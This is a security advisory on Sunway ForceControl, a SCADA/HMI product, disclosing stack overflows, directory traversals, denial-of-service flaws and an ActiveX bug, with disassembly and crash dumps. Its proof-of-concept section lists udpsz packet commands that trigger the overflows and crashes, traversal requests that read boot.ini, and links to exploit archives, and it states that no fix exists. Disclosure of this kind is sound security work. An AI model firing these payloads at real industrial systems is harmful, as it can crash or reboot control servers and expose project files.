#######################################################################
Luigi Auriemma
Application: Sunway ForceControl
http://www.sunwayland.com.cn/pro.asp
Versions: <= 6.1 sp3 with AngelServer and WebServer updated
Platforms: Windows
Bugs: various stack overflows
directory traversals
third party ActiveX code execution
various Denials of Service
Exploitation: remote
Date: 22 Sep 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
ForceControl is a chinese SCADA/HMI software.
#######################################################################
=======
2) Bugs
=======
-----------------------------
A] AngelServer stack overflow
-----------------------------
Signed comparison in packet 8 of AngelServer that leads to a stack
overflow:
004022E1 > B9 19000000 MOV ECX,19
004022E6 . 33C0 XOR EAX,EAX
004022E8 . 8D7C24 24 LEA EDI,DWORD PTR SS:[ESP+24]
004022EC . 83FE 64 CMP ESI,64 ; our value
004022EF . F3:AB REP STOS DWORD PTR ES:[EDI]
004022F1 . 0F8D E7000000 JGE AngelSer.004023DE ; signed
004022F7 . 8BCE MOV ECX,ESI
004022F9 . 8D75 0C LEA ESI,DWORD PTR SS:[EBP+C]
004022FC . 8BD1 MOV EDX,ECX
004022FE . 8D7C24 24 LEA EDI,DWORD PTR SS:[ESP+24]
00402302 . C1E9 02 SHR ECX,2 ; memcpy
00402305 . F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
00402307 . 8BCA MOV ECX,EDX
00402309 . 8D4424 24 LEA EAX,DWORD PTR SS:[ESP+24]
0040230D . 83E1 03 AND ECX,3
00402310 . 50 PUSH EAX
00402311 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
00402313 . 8B8C24 A0000000 MOV ECX,DWORD PTR SS:[ESP+A0]
0040231A . E8 A1FDFFFF CALL AngelSer.004020C0
0040231F . E9 BA000000 JMP AngelSer.004023DE
--------------------------------
B] WebServer directory traversal
--------------------------------
Through the usage of a 3-dots pattern it's possible to download the
files located in the disk of the project used by WebServer.
--------------------------------------------
C] various Denials of Service in AngelServer
--------------------------------------------
The AngelServer program is affected by various problems that lead to
Denial of Service effects:
- exception handler due to unallocable memory through packet 6
- invalid memory read access during memcpy through packet 6
- whole system reboot through packet 6
- endless loop during the handling of the interfaces through packet 6
- whole system reboot through packet 7
-------------------------------------
D] third party ActiveX code execution
-------------------------------------
This software is bundled with the "Cell Software"'s YRWXls.ocx ActiveX
component (BD9E5104-2F20-4A9F-AB14-82D558FF374E version 5.3.7.321 which
is the latest) and it's affected by a vulnerability in the Login method:
eax=886641aa ebx=02c55aac ecx=015ebd5c edx=886641ab esi=886641aa edi=015ebd88
eip=02c01db2 esp=015ebd10 ebp=02c867c0 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
YRWXls!DllRegisterServer+0x2ab62:
02c01db2 8a08 mov cl,byte ptr [eax] ds:0023:886641aa=??
0:008> gn
(a1c.e00): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=6ed9b6fc edx=7c8285f6 esi=00000000 edi=00000000
eip=6ed9b6fc esp=015eb948 ebp=015eb968 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
6ed9b6fc ?? ???
No additional research has been performed on the vulnerability, anyway
in my test it's necessary to load any other unsafe ActiveX component
first (tested on Windows 2003).
-------------------------------------
E] stack overflow in SNMP NetDBServer
-------------------------------------
Stack overflow caused by the copying of data chunks in a stack buffer:
0040303A |. 66:8B40 0A MOV AX,WORD PTR DS:[EAX+A] ; chunks
0040303E |. 0FBFC0 MOVSX EAX,AX
00403041 |. 3BC7 CMP EAX,EDI
00403043 |. 0F8E AC000000 JLE SNMP_Net.004030F5
00403049 |. 894424 14 MOV DWORD PTR SS:[ESP+14],EAX
0040304D |> B9 10000000 /MOV ECX,10
00403052 |. 33C0 |XOR EAX,EAX
00403054 |. 8D7C24 2C |LEA EDI,DWORD PTR SS:[ESP+2C]
00403058 |. 83C3 02 |ADD EBX,2
0040305B |. F3:AB |REP STOS DWORD PTR ES:[EDI]
0040305D |. 8B46 2C |MOV EAX,DWORD PTR DS:[ESI+2C]
00403060 |. 43 |INC EBX
00403061 |. 8D7C24 2C |LEA EDI,DWORD PTR SS:[ESP+2C]
00403065 |. 66:8B6C18 FD |MOV BP,WORD PTR DS:[EAX+EBX-3] ; chunk num
0040306A |. 8A4C18 FF |MOV CL,BYTE PTR DS:[EAX+EBX-1] ; chunk size
0040306E |. 884C24 20 |MOV BYTE PTR SS:[ESP+20],CL
00403072 |. 8D3418 |LEA ESI,DWORD PTR DS:[EAX+EBX]
00403075 |. 8B5424 20 |MOV EDX,DWORD PTR SS:[ESP+20]
00403079 |. 81E2 FF000000 |AND EDX,0FF
0040307F |. 8BCA |MOV ECX,EDX
00403081 |. 03DA |ADD EBX,EDX ; concatenate
00403083 |. 8BC1 |MOV EAX,ECX
00403085 |. C1E9 02 |SHR ECX,2 ; memcpy
00403088 |. F3:A5 |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
0040308A |. 8BC8 |MOV ECX,EAX
0040308C |. 83E1 03 |AND ECX,3
0040308F |. F3:A4 |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
---------------------------------------------
F] integer stack overflow in SNMP NetDBServer
---------------------------------------------
Signed 8 bit value expanded due to its sign and used in a memcpy over a
stack buffer, note that also in this case the chunked data is
concatenable so there is also this other way to exploit the overflow:
00402B78 |. 0FBE2C1A |MOVSX EBP,BYTE PTR DS:[EDX+EBX] ; 8bit expansion
00402B7C |. F3:AB |REP STOS DWORD PTR ES:[EDI]
00402B7E |. 8BCD |MOV ECX,EBP
00402B80 |. 43 |INC EBX
00402B81 |. 8BC1 |MOV EAX,ECX
00402B83 |. 8D7C24 20 |LEA EDI,DWORD PTR SS:[ESP+20]
00402B87 |. 8D341A |LEA ESI,DWORD PTR DS:[EDX+EBX]
00402B8A |. 03DD |ADD EBX,EBP ; concatenate
00402B8C |. C1E9 02 |SHR ECX,2 ; memcpy
00402B8F |. F3:A5 |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
00402B91 |. 8BC8 |MOV ECX,EAX
00402B93 |. 33C0 |XOR EAX,EAX
00402B95 |. 83E1 03 |AND ECX,3
00402B98 |. 43 |INC EBX
00402B99 |. F3:A4 |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
...and...
00402B9B |. 0FBE6C1A FF |MOVSX EBP,BYTE PTR DS:[EDX+EBX-1]
00402BA0 |. B9 10000000 |MOV ECX,10
00402BA5 |. 8D7C24 40 |LEA EDI,DWORD PTR SS:[ESP+40]
00402BA9 |. F3:AB |REP STOS DWORD PTR ES:[EDI]
00402BAB |. 8BCD |MOV ECX,EBP
00402BAD |. 8D341A |LEA ESI,DWORD PTR DS:[EDX+EBX]
00402BB0 |. 8BD1 |MOV EDX,ECX
00402BB2 |. 8D7C24 40 |LEA EDI,DWORD PTR SS:[ESP+40]
00402BB6 |. C1E9 02 |SHR ECX,2
00402BB9 |. F3:A5 |REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI]
00402BBB |. 8BCA |MOV ECX,EDX
00402BBD |. 8D4424 40 |LEA EAX,DWORD PTR SS:[ESP+40]
00402BC1 |. 83E1 03 |AND ECX,3
00402BC4 |. 50 |PUSH EAX
00402BC5 |. F3:A4 |REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
----------------------------------------
G] Denial of Service in SNMP NetDBServer
----------------------------------------
00402A0A |> 8B4B 30 MOV ECX,DWORD PTR DS:[EBX+30]
00402A0D |. 83F9 0B CMP ECX,0B
00402A10 |. 7C 24 JL SHORT SNMP_Net.00402A36
00402A12 |. 8B5B 2C MOV EBX,DWORD PTR DS:[EBX+2C]
00402A15 |. 8B43 06 MOV EAX,DWORD PTR DS:[EBX+6]
00402A18 |. 3BC8 CMP ECX,EAX
00402A1A |. 7C 1A JL SHORT SNMP_Net.00402A36 ; signed comparison
00402A1C |. 8D5403 FE LEA EDX,DWORD PTR DS:[EBX+EAX-2]
00402A20 |. B9 A0704000 MOV ECX,SNMP_Net.004070A
00402A25 |. 5F POP EDI
00402A26 |. 5E POP ESI
00402A27 |. 66:8B02 MOV AX,WORD PTR DS:[EDX] ; invalid access
-----------------------------------
H] Directory traversal in NetServer
-----------------------------------
Through this server it's possible to read any file in the disk where is
located the project via directory traversal.
Opcodes 0x00 and 0x04 are used to open the file (the first one only
adds the full project path to the name) while 0x02 is used to read and
send its content with the possibility of specifying also the offset.
Note that there is also a very limited heap overflow caused by some
calculations performed on the offset where is possible to allocate a 0
bytes buffer for the reply packet but with only a Denial of Service
effect.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip (version 0.3.3)
http://www.exploit-db.com/sploits/17885-1.zip
A]
udpsz -T -C "08000000 00000000 ffffffff" -b a SERVER 8800 0x400
B]
http://SERVER/.../.../.../boot.ini
C]
udpsz -T -C "06000000 00000000 ffffffff" -b a SERVER 8800 0x400
udpsz -T -C "06000000 00000000 ffffff00" -b a SERVER 8800 0x400
udpsz -T -C "06000000 00000000 00040000" -b a SERVER 8800 0x400
udpsz -T -C "06000000 00000000 00040000" -c "2147483647," -b a SERVER 8800 0x400
udpsz -T -C "07000000 00000000 00000000" SERVER 8800 0x400
D]
http://aluigi.org/poc/yrwxls_1.zip
http://www.exploit-db.com/sploits/17885-2.zip
E]
udpsz -C "eb50eb50 5300 ffff0000 0100 ffff ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff
F]
udpsz -C "eb50eb50 5700 ffff0000 0100 ff" 0 -C "0d0a" -1 -b a -T SERVER 2001 0xffff
G]
udpsz -C "eb50eb50 0000 80808080" -T SERVER 2001 0xb
H]
udpsz -D -1 -C "8888888888888888 00010000 01000000 04000000 2e2e5c2e2e5c626f6f742e696e69" 0 -C "8888888888888888 1c000000 01000000 02000000 00000000 ffffff7f" -1 -T SERVER 2006 0x11c
#######################################################################
======
4) Fix
======
No fix.
#######################################################################